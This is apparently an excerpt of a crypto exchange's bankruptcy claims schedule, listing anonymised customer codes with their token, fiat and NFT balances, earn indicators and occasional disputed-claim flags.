| 07327888 | | BRZ[0], BTC[0], ETH[0], ETHW[0], LINK[0], SHIB[2], SOL[0.00000001], SUSHI[0], USD[0.01], USDT[0.00000001] | Yes | |
| 07327889 | | USD[10.00] | | |
| 07327890 | | CUSDT[2], USD[1.46] | | |
| 07327891 | | DOGE[2.00413274], USD[0.00] | | |
| 07327892 | | DOGE[1], USD[70.62] | | |
| 07327893 | | BTC[.00021154], CUSDT[7], DOGE[15.70564126], TRX[1], USD[0.00] | | |
| 07327894 | | BTC[.00023513], SHIB[1], USD[0.00] | Yes | |
| 07327895 | | ETH[0.00319233], ETHW[0.00319233], USD[0.00] | | |
| 07327896 | | CUSDT[2], DOGE[710.52197768], USD[0.00] | Yes | |
| 07327897 | | DOGE[.728], USD[0.04] | | |
| 07327898 | | BTC[0], CUSDT[3], DOGE[0], TRX[2], USD[0.00] | | |
| 07327899 | | USD[10.00] | | |
| 07327900 | | BAT[0], DOGE[1], TRX[.000027], USD[0.00] | | |
| 07327901 | | DOGE[.667], USD[0.00], USDT[0] | | |
| 07327903 | | USD[10.00] | | |
| 07327904 | | USD[10.00] | | |
| 07327906 | | BAT[2], BRZ[2], CUSDT[2], DOGE[2], GRT[5], SUSHI[1], TRX[1], USD[0.00], USDT[0.00003279] | | |
| 07327907 | | DOGE[.4466], LTC[.00787003], TRX[22369.468809], USD[0.10], USDT[0.09487676] | | |
| 07327908 | | DOGE[152.6308992], USD[0.00] | Yes | |
| 07327910 | | DOGE[0], LTC[0], SOL[1.34], TRX[0.64552664], USDT[.35335806] | | |
| 07327911 | | BRZ[3], CUSDT[5], GRT[1], TRX[7], USD[0.00], USDT[1] | | |
| 07327912 | | DOGE[1], USD[0.00] | | |
| 07327913 | | TRX[156.29107524], USD[0.00] | | |
| 07327914 | | DOGE[1], USD[13.76] | | |
| 07327915 | | USD[0.00] | | |
| 07327917 | | BTC[0], CUSDT[9], DOGE[1], USD[0.00] | | |
| 07327919 | | BRZ[0.00000001], BTC[0], CUSDT[1], DOGE[1], GRT[0], TRX[0], USD[0.00] | | |
| 07327920 | | USD[10.00] | | |
| 07327921 | | TRX[214.0831152], USD[0.00] | | |
| 07327922 | | USD[10.00] | | |
| 07327923 | | USD[10.00] | | |
| 07327924 | | USD[10.00] | | |
| 07327925 | | USD[10.00] | | |
| 07327926 | | USD[10.00] | | |
| 07327928 | | USD[10.00] | | |
| 07327929 | | BTC[.00007378], ETHW[.0209202], USD[1.65] | | |
| 07327930 | | USD[0.00] | | |
| 07327931 | | BRZ[1], CUSDT[1], DOGE[1], TRX[1], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07327932 | | DAI[0], DOGE[139.59602946], ETH[0.01094281], ETHW[0.01094281], KSHIB[0], SHIB[1], SOL[1.10021444], SUSHI[0], UNI[0], USD[40.00] | | |
| 07327933 | | USD[10.00] | | |
| 07327934 | | USD[10.00] | | |
| 07327936 | | DOGE[18573.94078017] | | |
| 07327937 | | USD[10.00] | | |
| 07327938 | | USD[10.00] | | |
| 07327939 | | BTC[.00000014], USD[0.00] | | |
| 07327941 | | CUSDT[2], DOGE[1], TRX[3], USD[0.00] | Yes | |
| 07327942 | | USD[10.00] | | |
| 07327944 | | DOGE[9.06229315], USD[30.19] | | |
| 07327945 | | CUSDT[2], DOGE[367.15511364], ETH[.01679822], ETHW[.01679822], TRX[2], USD[127.60] | | |
| 07327946 | | BTC[0], CUSDT[1], DOGE[0], TRX[1], USD[0.00] | | |
| 07327947 | | BCH[0], BTC[0], ETH[0], NFT (416490596375686710/Entrance Voucher #1852)[1], TRX[1], USD[0.00] | | |
| 07327948 | | CUSDT[3], ETH[.00908121], ETHW[.00897177], USD[0.00] | Yes | |
| 07327950 | | SHIB[2], USD[0.24] | Yes | |
| 07327951 | | BAT[0], BRZ[0], DAI[0], DOGE[0], ETH[0], ETHW[0], LINK[0], LTC[0], SHIB[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[1.02543197] | Yes | |
| 07327952 | | USD[10.00] | | |
| 07327953 | | BRZ[6.3646929], CUSDT[1], DOGE[0], ETH[18.56334132], ETHW[26.55766936], SOL[804.01125389], TRX[1], USD[0.00], USDT[2.11829415] | Yes | |
| 07327955 | | BRZ[4], BTC[0], CUSDT[7], DOGE[0.00224077], ETH[0], GRT[0], MATIC[0], NFT (305472073938090957/Petal to the Metal #15-Legend)[1], NFT (372440318791294492/Imola Ticket Stub #1119)[1], NFT (397375089167126758/Bloom City #46-Rookie)[1], NFT (398161077307961231/Ethereal Camel)[1], NFT (404490261198013718/Barcelona Ticket Stub #726)[1], NFT (512454871448346938/FTX - Off The Grid Miami #5050)[1], NFT (542437558790418690/FTX - Off The Grid Miami #1072)[1], SHIB[4], SOL[0], TRX[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07327956 | | BRZ[1], BTC[.00103666], CUSDT[1], DOGE[2.00085302], TRX[2], USD[0.06] | | |
| 07327957 | | USD[0.00] | | |
| 07327958 | | BTC[0], DOGE[0], NFT (425060670923116308/broken piano)[1], TRX[0], USD[0.22] | | |
| 07327961 | | USD[10.00] | | |
| 07327962 | | BRZ[.00006596], CUSDT[42.00391986], DOGE[3], ETH[0], MATIC[.0001284], SHIB[282.06256070], TRX[.00019722], USD[14.78], USDT[0.00000931] | Yes | |
| 07327963 | | DOGE[1514.62036115], ETH[1.00099485], ETHW[1.00099485], LTC[1.15103873], TRX[2], USD[166.00] | | |
| 07327964 | | USD[10.00] | | |
| 07327965 | | USD[0.00] | | |
| 07327966 | | BAT[1], CUSDT[1], DOGE[4], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0], TRX[2], UNI[0], USD[0.00] | | |
| 07327967 | | USD[10.00] | | |
| 07327968 | | CUSDT[2], DOGE[5], USD[0.00] | | |
| 07327970 | | USD[11.00] | Yes | |
| 07327971 | | CUSDT[547.99710134], DOGE[1417.24508324], USD[0.00] | | |
| 07327972 | | DOGE[1], USD[0.00] | | |
| 07327973 | | BAT[1], CUSDT[3], DOGE[.00000365], TRX[1], USD[0.01] | | |
| 07327974 | | USD[10.00] | | |
| 07327975 | | USD[0.82], USDT[0.00000001] | | |
| 07327976 | | BRZ[1], DOGE[1], TRX[4], USD[0.00] | | |
| 07327979 | | CUSDT[3], DOGE[230.39326816], SHIB[1047048.50964348], USD[0.00] | | |
| 07327980 | | USD[11.06] | Yes | |
| 07327983 | | BTC[0], ETH[0], SOL[.03], USD[0.61] | | |
| 07327984 | | USD[10.00] | | |
| 07327985 | | USD[10.00] | | |
| 07327986 | | USD[10.00] | | |
| 07327987 | | CUSDT[6], GRT[1], TRX[2], USD[0.00], USDT[0] | | |
| 07327988 | | USD[10.00] | | |
| 07327989 | | DOGE[1], USD[0.01] | | |
| 07327990 | | DOGE[81.058], USD[0.01] | | |
| 07327991 | | USD[0.00] | | |
| 07327992 | | USD[0.00] | Yes | |
| 07327993 | | DOGE[.00295995], USD[10.00] | | |
| 07327994 | | USD[10.00] | | |
| 07327995 | | BTC[0.00093630], SOL[18.19489941], USD[0.00] | Yes | |
| 07327996 | | CUSDT[2], USD[0.00] | | |
| 07327997 | | CUSDT[1], SUSHI[1.68567359], USD[0.00] | | |
| 07327998 | | USD[10.00] | | |
| 07327999 | | ETH[.00000677], ETHW[.00000677], USD[0.00] | | |
| 07328001 | | DOGE[3555.67462818], USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07328002 | | ETH[.00533596], ETHW[.00533596], USD[10.00] | | |
| 07328003 | | BTC[.0014905], CUSDT[7], DOGE[454.79805974], ETH[.10210655], ETHW[.10210655], LTC[.3068693], SOL[1.72451564], USD[0.00] | | |
| 07328004 | | USD[10.00] | | |
| 07328005 | | BRZ[1], CUSDT[4], DOGE[.00000183], SOL[.00056913], TRX[2], USD[2.00] | | |
| 07328006 | | BAT[1], BRZ[2], BTC[0], CUSDT[14], DOGE[9], ETH[0], ETHW[0.23043554], GRT[1], LINK[0], SHIB[4], SOL[0], TRX[6], USD[380.66] | | |
| 07328007 | | USD[10.00] | | |
| 07328008 | | USD[10.00] | | |
| 07328009 | | USD[10.00] | | |
| 07328011 | | BRZ[0], DOGE[18574.83796121], ETH[1.13909958], ETHW[1.13862118], LINK[3.69902044], SHIB[24313869.68001278], USD[0.00], USDT[0] | Yes | |
| 07328012 | | USD[10.00] | | |
| 07328014 | | BTC[.00004984], USD[10.00] | | |
| 07328015 | | DOGE[1], TRX[1], USD[0.01], USDT[0] | | |
| 07328016 | | USD[10.00] | | |
| 07328017 | | USD[10.00] | | |
| 07328020 | | DOGE[723.73789954], SOL[0], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07328021 | | CUSDT[1], DOGE[29.7529277], USD[0.00] | | |
| 07328022 | | BTC[.00107418], CUSDT[509.97525974], DOGE[1903.2570096], ETH[.04057382], ETHW[.04057382], TRX[229.02184284], USD[13.10] | | |
| 07328023 | | USD[10.00] | | |
| 07328024 | | USD[10.00] | | |
| 07328025 | | USD[10.00] | | |
| 07328026 | | USD[10.00] | | |
| 07328027 | | BRZ[2], CUSDT[19], DOGE[.22684198], TRX[2], USD[0.30] | | |
| 07328028 | | BRZ[0], BTC[0], DOGE[0.00000011], ETH[0], USD[0.00] | | |
| 07328030 | | BTC[0], TRX[0], USD[0.00] | | |
| 07328031 | | USD[10.00] | | |
| 07328032 | | USD[10.00] | | |
| 07328033 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07328034 | | USD[10.00] | | |
| 07328036 | | USD[10.00] | | |
| 07328037 | | USD[10.00] | | |
| 07328038 | | DOGE[9240.60751084], LINK[47.50516483], SOL[37.61313571], TRX[1], USD[0.00], USDT[0.00000001] | | |
| 07328039 | | USD[10.00] | | |
| 07328040 | | USD[10.00] | | |
| 07328041 | | ETH[.02171944], ETHW[.02171944], GRT[23.1763799], TRX[1], USD[0.00] | | |
| 07328042 | | CUSDT[3], DOGE[4], GRT[1], SHIB[1], TRX[2], USD[0.00], USDT[0.00000061] | Yes | |
| 07328044 | | USD[20.00] | | |
| 07328045 | | BTC[0], CUSDT[2], DOGE[165.14017424], GRT[0], SOL[0], USD[0.00] | | |
| 07328046 | | USD[10.00] | | |
| 07328047 | | USD[10.00] | | |
| 07328048 | | BRZ[0.00000003], BTC[.00000294], CUSDT[11.7234985], DOGE[2], USD[0.01] | | |
| 07328049 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07328050 | | USD[10.00] | | |
| 07328051 | | DOGE[0], SHIB[0], USD[69.06] | Yes | |
| 07328052 | | CUSDT[1], DOGE[1], TRX[2], USD[0.00] | | |
| 07328053 | | USD[10.00] | | |
| 07328054 | | BRZ[4], CUSDT[11], GRT[1.00498957], TRX[7], USD[0.04], USDT[0] | Yes | |
| 07328055 | | USD[10.00] | | |
| 07328056 | | USD[10.00] | | |
| 07328057 | | CUSDT[1], USD[0.00] | | |
| 07328058 | | USD[10.00] | | |
| 07328059 | | USD[10.00] | | |
| 07328060 | | USD[0.00] | Yes | |
| 07328062 | | USD[10.00] | | |
| 07328063 | | BCH[0], NFT (347873390903580983/The Association NFT)[1], NFT (405591610105883850/Entrance Voucher #2039)[1], SHIB[2], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07328064 | | BRZ[0.00000188], DOGE[0], LTC[.04076164], TRX[1], USD[0.00], USDT[0.00000143] | | |
| 07328065 | | DOGE[187.54871577], USD[0.00] | | |
| 07328066 | | USD[10.00] | | |
| 07328067 | | CUSDT[5], DOGE[167.8457526], TRX[471.09739897], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07328068 | | BRZ[1], CUSDT[2], DOGE[1], ETH[0], SOL[0], TRX[1], USD[0.00] | | |
| 07328069 | | USD[10.00] | | |
| 07328070 | | CUSDT[2], DOGE[1501.70722698], USD[0.00] | | |
| 07328071 | | USD[10.00] | | |
| 07328073 | | BTC[0.44516655], CUSDT[2], DOGE[1], ETH[3.32022249], ETHW[3.31897144], LTC[3.19914098], SUSHI[.00613532], TRX[2], USD[0.00], USDT[2.12950167] | Yes | |
| 07328075 | | BAT[3.2519365], BRZ[4], CUSDT[11], DOGE[73567.24508609], GRT[3.17147257], TRX[13.19631862], USD[383.36], USDT[2.1894516] | Yes | |
| 07328076 | | USD[10.00] | | |
| 07328077 | | CUSDT[2], DOGE[145.44412573], TRX[2], USD[0.00] | | |
| 07328078 | | USD[10.00] | | |
| 07328079 | | DOGE[1.66504894], USD[0.00] | | |
| 07328080 | | CUSDT[1], DOGE[10.64978471], ETH[.00211581], ETHW[.00208843], USD[0.00] | Yes | |
| 07328081 | | BTC[0], CUSDT[1], DOGE[1], SOL[0], TRX[0], UNI[0], USD[0.00] | | |
| 07328082 | | BTC[.00017461] | | |
| 07328083 | | DOGE[415.92361306], USD[0.00] | | |
| 07328084 | | USD[10.00] | | |
| 07328087 | | USD[25.00] | | |
| 07328089 | | SHIB[0], USD[0.00] | | |
| 07328090 | | CUSDT[1], DOGE[.67968516], USD[9.62] | | |
| 07328091 | | CUSDT[1], DOGE[.00001905], ETH[0], USD[0.00] | | |
| 07328092 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07328095 | | BTC[.00045356], CUSDT[1089.70094501], DOGE[5415.49141472], ETH[.08930671], ETHW[.08826670], LINK[1.37363875], MATIC[25.76224095], NFT [55080604400447511/Entrance Voucher #3484][1], SHIB[873360.54584253], SOL[0.93314165], TRX[288.43395972], USD[0.00] | Yes | |
| 07328096 | | DOGE[2151.02549849], USD[0.07] | | |
| 07328097 | | DOGE[1], USD[0.00] | | |
| 07328099 | | BTC[0.00000309], USD[0.01] | | |
| 07328100 | | USD[10.00] | | |
| 07328101 | | BCH[.26484507], BRZ[6.66222182], BTC[0.00037978], CUSDT[67.56194729], GRT[1.00498957], TRX[17.58222185], USD[0.00], USDT[1.11030948] | Yes | |
| 07328102 | | USD[10.00] | | |
| 07328103 | | BRZ[1], CUSDT[2], DOGE[1388.55535929], USD[50.00] | | |
| 07328104 | | USD[10.00] | | |
| 07328106 | | DOGE[470.94025209], USD[0.00] | | |
| 07328107 | | ETH[.00297122], ETHW[.00297122], USD[0.00] | | |
| 07328109 | | USD[10.00] | | |
| 07328111 | | USD[10.00] | | |
| 07328112 | | CUSDT[6], DOGE[84.065919], ETH[.01430443], ETHW[.04868922], SHIB[64821.20047942], TRX[1], USD[0.00] | Yes | |
| 07328113 | | USD[10.00] | | |
| 07328114 | | DOGE[0], USD[0.00] | | |
| 07328115 | | DOGE[14.45317747], USD[0.00] | | |
| 07328116 | | USD[10.00] | | |
| 07328117 | | BTC[.00020178], CUSDT[8], DOGE[2891.7242769], ETH[.00560895], ETHW[.00554055], SOL[2.53027407], TRX[415.33724287], USD[0.31] | Yes | |
| 07328119 | | USD[10.00] | | |
| 07328121 | | USD[10.00] | | |
| 07328122 | | CUSDT[3], GRT[1], TRX[1], USD[0.01] | | |
| 07328123 | | BTC[.0001], USD[1.56] | | |
| 07328124 | | BTC[0.00026626], DOGE[8.70806679], ETH[.0060296], ETHW[.0060296], LTC[.16157689], USD[0.00] | | |
| 07328125 | | USD[10.00] | | |
| 07328126 | | USD[10.00] | | |
| 07328127 | | USD[11.04] | Yes | |
| 07328128 | | BTC[.00039913], CUSDT[3], DOGE[1349.03701838], TRX[3], USD[0.00] | | |
| 07328129 | | ETH[.00248127], ETHW[.00248127], USD[0.00] | | |
| 07328130 | | USD[0.01], USDT[0.00000001] | | |
| 07328131 | | BRZ[1], CUSDT[1], DOGE[.00066001], USD[219.52] | | |
| 07328133 | | DOGE[0], ETH[0.00000001], TRX[0], USD[0.00], USDT[0] | | |
| 07328134 | | USD[0.01] | | |
| 07328135 | | AAVE[2.62599034], BAT[428.35751215], BRZ[14.18546915], BTC[.01041572], CUSDT[36], DOGE[2219.77635652], GRT[238.79415401], LINK[59.2098185], LTC[3.60779543], MATIC[1645.06978216], SOL[41.13912544], SUSHI[16.50570222], TRX[3335.0442401], UNI[9.67006175], USD[-1166.90], USDT[1.06832566] | Yes | |
| 07328137 | | BAT[0], BCH[0.00122488], BTC[0], DOGE[0], ETH[0], ETHW[0], GRT[0], LINK[0], LTC[0.00572235], NFT [555719133036922419/Imola Ticket Stub #27][1], SOL[0], SUSHI[0], TRX[5.37506151], UNI[0], USD[0.00] | | |
| 07328139 | | USD[10.00] | | |
| 07328140 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07328141 | | USD[10.00] | | |
| 07328142 | | CUSDT[1], DOGE[2], TRX[1], USD[10.00], USDT[1] | | |
| 07328143 | | USD[10.00] | | |
| 07328145 | | USD[10.00] | | |
| 07328146 | | USD[10.00] | | |
| 07328147 | | USD[10.00] | | |
| 07328148 | | CUSDT[1], DOGE[.27554035], TRX[2], USD[0.26] | | |
| 07328152 | | USD[10.00] | | |
| 07328155 | | USD[10.00] | | |
| 07328156 | | BRZ[2], CUSDT[3], DOGE[0], TRX[1], USD[0.00] | | |
| 07328157 | | CUSDT[1], DOGE[2], USD[0.00], USDT[1] | | |
| 07328158 | | CUSDT[6], SUSHI[0.00012126], TRX[1], USD[0.00] | Yes | |
| 07328161 | | CUSDT[469.39586653], DOGE[340.5585065], TRX[163.15644693], USD[32.21] | | |
| 07328162 | | USD[10.00] | | |
| 07328163 | | USD[0.00] | | |
| 07328164 | | BRZ[0.00000010], ETH[0], USD[0.00] | | |
| 07328165 | | CUSDT[.00003676], SHIB[1019378.33060556], USD[0.00] | | |
| 07328166 | | CUSDT[4], LINK[2.22582975], MATIC[.00036934], SOL[0], USD[0.00] | Yes | |
| 07328167 | | USD[10.00] | | |
| 07328168 | | BRZ[1], BTC[.00673704], CUSDT[2], DOGE[943.50375902], GRT[1], TRX[943.17971668], USD[0.00] | | |
| 07328169 | | TRX[1], USD[0.00] | | |
| 07328170 | | USD[10.00] | | |
| 07328171 | | CUSDT[473.75825128], DOGE[1], USD[0.00] | | |
| 07328174 | | USD[10.00] | | |
| 07328175 | | USD[10.00] | | |
| 07328176 | | USD[10.00] | | |
| 07328177 | | USD[11.05] | Yes | |
| 07328178 | | BRZ[1], CUSDT[2], DOGE[795.96266417], TRX[2], USD[0.00] | Yes | |
| 07328179 | | NFT (44056736070547385B/Careless Cat #268)[1], USD[0.05] | | |
| 07328180 | | USD[10.00] | | |
| 07328181 | | BRZ[2], DOGE[1], USD[0.00] | | |
| 07328182 | | CUSDT[1], DOGE[47.26425234], USD[21.14] | | |
| 07328183 | | USD[10.00] | | |
| 07328184 | | AVAX[7.43351199], BTC[.00808894], ETH[.1675937], ETHW[.16725098], GRT[15.65227926], LINK[14.47966238], MATIC[534.91476805], SHIB[1946387.09626944], SOL[2.14088102], USD[0.00] | Yes | |
| 07328185 | | USD[10.00] | | |
| 07328186 | | BAT[1], CUSDT[1], USD[0.01] | | |
| 07328188 | | USD[10.00] | | |
| 07328193 | | USD[10.00] | | |
| 07328195 | | USD[37.37] | | |
| 07328196 | | USD[10.00] | | |
| 07328198 | | BRZ[2], CUSDT[2], NFT (33741014858520247/Shannon Sharpe's Playbook: Denver Broncos vs. Los Angeles Raiders - January 9, 1994 #38)[1], NFT (35500674049039456/Shannon Sharpe's Playbook: Baltimore Ravens vs. Denver Broncos - December 31, 2000 #45)[1], NFT (50934929859690709/Shannon Sharpe's Playbook: Baltimore Ravens vs. Oakland Raiders - January 14, 2001 #53)[1], NFT (57166458080003607/Shannon Sharpe's Playbook: Kansas City Chiefs vs Denver Broncos - October 4, 1992 #44)[1], TRX[1], USD[13.32] | Yes | |
| 07328199 | | TRX[178.34916092], USD[0.00] | | |
| 07328200 | | USD[10.00] | | |
| 07328201 | | BRZ[2], BTC[.00000004], DOGE[.00269836], SHIB[4], SOL[.00001756], SUSHI[.00003445], TRX[.02423814], UNI[.00005905], USD[313.15] | Yes | |
| 07328202 | | USD[10.00] | | |
| 07328204 | | CUSDT[9], USD[0.00] | Yes | |
| 07328206 | | USD[10.00] | | |
| 07328208 | | USD[10.00] | | |
| 07328209 | | USD[41.99] | Yes | |
| 07328210 | | TRX[1], USD[7.17] | | |
| 07328211 | | USD[10.00] | | |
| 07328212 | | BF_POINT[300], DOGE[1], ETHW[1.28016948], MATIC[.00006607], MKR[.00000074], SHIB[24324668.53523228], SUSHI[.00029691], USD[4909.45], USDT[.00000001], YFI[.00000003] | Yes | |
| 07328215 | | BRZ[2], CUSDT[6], DOGE[166.36062664], TRX[4], USD[0.00], USDT[0] | | |
| 07328216 | | DOGE[358.57098454], USD[10.00] | | |
| 07328217 | | USD[10.00] | | |
| 07328218 | | CUSDT[1], DOGE[794.11781765], TRX[1], USD[66.13] | | |
| 07328219 | | BRZ[1], BTC[0.00255450], CUSDT[1], DOGE[3124.6250704], TRX[1], USD[298.21], USDT[1] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07328220 | | DOGE[26.37817176], USD[0.00] | | |
| 07328221 | | CUSDT[1], DOGE[1.01861321], USD[0.00] | | |
| 07328222 | | USD[10.00] | | |
| 07328223 | | DOGE[191.31450301], TRX[23.90591166], USD[0.84] | Yes | |
| 07328224 | | CUSDT[2720.3707614], DOGE[304.89439083], TRX[2], USD[0.00], USDT[57.66444935] | Yes | |
| 07328225 | | BTC[.0000996], DOGE[200.496], LTC[4.28001], SHIB[399600], USD[4.36] | | |
| 07328226 | | USD[10.00] | | |
| 07328227 | | DOGE[2], TRX[3.10610651], USD[0.00] | | |
| 07328228 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07328229 | | USD[10.00] | | |
| 07328230 | | CUSDT[3], DOGE[110.37258969], ETH[.01204634], ETHW[.01189586], KSHIB[249.39280598], LINK[1.01153859], SOL[.19088562], UNI[.00000073], USD[0.00] | Yes | |
| 07328231 | | CUSDT[2], TRX[1], USD[0.00], USDT[1.00019173] | Yes | |
| 07328232 | | CUSDT[8], DOGE[217.11966831], TRX[1.00046613], USD[0.84] | | |
| 07328233 | | USD[10.00] | | |
| 07328234 | | BTC[0], DOGE[0], USD[0.45] | | |
| 07328235 | | USD[10.00] | | |
| 07328236 | | DOGE[1], TRX[.00003389], USD[0.00] | Yes | |
| 07328237 | | ETH[.0000047], ETHW[.0000047], USD[0.00], USDT[0] | | |
| 07328238 | | CUSDT[6], DOGE[46.00000725], TRX[2], USD[0.11] | | |
| 07328239 | | DOGE[.414], ETH[.000626], ETHW[.000626], USD[0.96] | | |
| 07328240 | | DOGE[1], USD[0.00], USDT[0] | | |
| 07328241 | | USD[10.00] | | |
| 07328244 | | BAT[1.0165555], BRZ[1], BTC[0], CUSDT[13], DOGE[415.03262551], ETH[0], MATIC[0], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07328245 | | BAT[1], BRZ[3], CUSDT[1], DOGE[.26465063], USD[1.41], USDT[1] | | |
| 07328246 | | USD[10.00] | | |
| 07328247 | | CUSDT[3], USD[0.00] | | |
| 07328248 | | BRZ[2], CUSDT[13], DOGE[.18907933], TRX[.57183251], USD[0.30] | | |
| 07328249 | | BRZ[2], BTC[0.00007724], CUSDT[22], DOGE[1666.67138284], GRT[4.03421946], TRX[2.00993033], USD[0.82] | | |
| 07328250 | | USD[10.00] | | |
| 07328251 | | BRZ[1], CUSDT[3], DOGE[1.03207642], ETH[.0000078], ETHW[.0000078], LINK[.0005081], TRX[2], USD[0.67] | | |
| 07328252 | | BRZ[3.78733843], CUSDT[19], GRT[1], USD[0.00] | | |
| 07328253 | | BAT[1], BRZ[2], GRT[1], TRX[1], USD[0.00], USDT[0] | | |
| 07328254 | | USD[10.00] | | |
| 07328255 | | ALGO[12.08545273], AUD[0.00], AVAX[0.00000109], BAT[107.76195699], BCH[0], BTC[0], CAD[0.00], CHF[0.00], DOGE[176.24619139], ETH[0], ETHW[2.69556732], EUR[0.00], GBP[0.00], GRT[58.41302340], HKD[0.00], KSHIB[275.83220788], LINK[2.01424219], LTC[0], MATIC[19.13530078], MKR[0], NEAR[0.66403469], NFT [389945611981526601/Red Panda #52][1], PAXG[0.00000001], SHIB[459669.59377234], SOL[1.88298662], SUSHI[3.02136330], TRX[691.89219111], UNI[2.01424219], USD[0.00], USDT[0], YFI[0], ZAR[0.00] | Yes | |
| 07328256 | | BRZ[2], DOGE[463.08864561], SHIB[2447813.59719119], TRX[1], USD[0.00] | | |
| 07328257 | | USD[10.00] | | |
| 07328258 | | BTC[.0003652], DOGE[1170.90261866], USD[1.72] | | |
| 07328259 | | CUSDT[2], USD[0.00] | | |
| 07328261 | | USD[10.00] | | |
| 07328262 | | CUSDT[1], DOGE[2], USD[9.49] | | |
| 07328263 | | ETH[0], ETHW[0.00756362], TRX[4.03503588], USD[0.00] | Yes | |
| 07328264 | | USD[10.00] | | |
| 07328266 | | BTC[0], CUSDT[1], DOGE[0], ETH[0], USD[0.00] | | |
| 07328267 | | USD[10.00] | | |
| 07328268 | | USD[21.39] | Yes | |
| 07328270 | | USD[0.00] | | |
| 07328271 | | USD[10.00] | | |
| 07328272 | | USD[10.00] | | |
| 07328273 | | USD[10.00] | | |
| 07328274 | | ETH[0], USD[0.00], USDT[0] | | |
| 07328275 | | BRZ[10.76122077], CUSDT[2], LTC[.00950764], TRX[1], USD[0.00] | | |
| 07328276 | | BTC[.00323349], DOGE[16577.05730022], ETH[.08929239], ETHW[.08929239], TRX[2], USD[0.00] | | |
| 07328277 | | BTC[.0002971], USD[0.00] | | |
| 07328278 | | CUSDT[1], DOGE[573.04418319], USD[0.00] | | |
| 07328279 | | DOGE[362.12052363], USD[0.00] | Yes | |
| 07328280 | | USD[10.00] | | |
| 07328281 | | DOGE[2963.50319824], USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07328282 | | CUSDT[3], DOGE[162.41814062], TRX[1], USD[0.05] | | |
| 07328283 | | USD[10.00] | | |
| 07328284 | | DOGE[2732.72570067], USD[0.00] | | |
| 07328285 | | TRX[234.76786292], USD[0.00] | | |
| 07328286 | | SHIB[0], SOL[0.18590242], USD[0.00] | Yes | |
| 07328287 | | CUSDT[5], DOGE[1], TRX[1], USD[1.19] | | |
| 07328288 | | DOGE[1.00005226], USD[0.01] | | |
| 07328289 | | USD[10.00] | | |
| 07328290 | | USD[298.75] | Yes | |
| 07328291 | | BAT[1], BRZ[2], CUSDT[3], GRT[1], LINK[1], SHIB[3], TRX[7], USD[0.00], USDT[2] | | |
| 07328292 | | USD[10.00] | | |
| 07328293 | | TRX[1], USD[0.00] | | |
| 07328294 | | USD[10.00] | | |
| 07328295 | Contingent, Disputed | BTC[.0000082], CUSDT[1], DOGE[0], TRX[1], USD[0.25] | | |
| 07328297 | | BAT[1], BRZ[1], CUSDT[10], DOGE[252.41340661], SUSHI[.00001766], TRX[3.30001125], USD[38.29] | | |
| 07328299 | | USD[10.00] | | |
| 07328300 | | USD[0.01] | | |
| 07328301 | | BTC[.0002035], CUSDT[6], DOGE[1], ETH[.01145809], ETHW[.01145809], TRX[4], USD[0.00] | | |
| 07328303 | | USD[10.00] | | |
| 07328305 | | USD[10.00] | | |
| 07328306 | | DOGE[140.88761451], USD[0.00] | | |
| 07328307 | | USD[10.00] | | |
| 07328308 | | USD[10.00] | | |
| 07328310 | | BAT[1], BTC[0], CUSDT[2], DOGE[4], ETH[0], ETHW[0], SUSHI[1], TRX[8], USD[0.00], USDT[0], YFI[0] | | |
| 07328311 | | USD[10.00] | | |
| 07328312 | | DOGE[3314.14381162], USD[0.00] | Yes | |
| 07328313 | | USD[10.00] | | |
| 07328315 | | USD[10.00] | | |
| 07328316 | | USD[10.00] | | |
| 07328317 | | USD[10.00] | | |
| 07328318 | | USD[10.00] | | |
| 07328320 | | DOGE[0], USD[0.00] | Yes | |
| 07328321 | | BTC[0], DOGE[0], TRX[2], USD[0.00] | | |
| 07328322 | | BF_POINT[100], SOL[.25331624], USD[0.00] | | |
| 07328324 | | USD[10.00] | | |
| 07328325 | | DOGE[928.94489343], USD[10.00] | | |
| 07328326 | | USD[10.00] | | |
| 07328327 | | BRZ[2], CUSDT[2], DOGE[0], TRX[2], USD[0.00], USDT[1.10542264] | Yes | |
| 07328328 | | CUSDT[8], DOGE[.70059626], ETH[.00168365], ETHW[.00168365], TRX[1], USD[0.46] | | |
| 07328330 | | USD[10.00] | | |
| 07328331 | | BRZ[0], BTC[0], DOGE[0], SUSHI[0], UNI[0], USD[0.00], USDT[0.12980983] | | |
| 07328332 | | BAT[1], BRZ[1], DOGE[.00002689], TRX[1], USD[0.01] | | |
| 07328333 | | CUSDT[2], DOGE[100.25465643], USD[0.00] | Yes | |
| 07328334 | | BAT[1], BRZ[2], BTC[0], DOGE[1392.16429743], TRX[1], USD[0.00], USDT[1] | | |
| 07328335 | | ETH[.00392673], ETHW[.00392673], USD[0.00] | | |
| 07328336 | | USD[10.00] | | |
| 07328337 | | BTC[0], CUSDT[1], DOGE[1], ETH[0], SHIB[1], SOL[0], USD[0.00] | Yes | |
| 07328338 | | USD[10.00] | | |
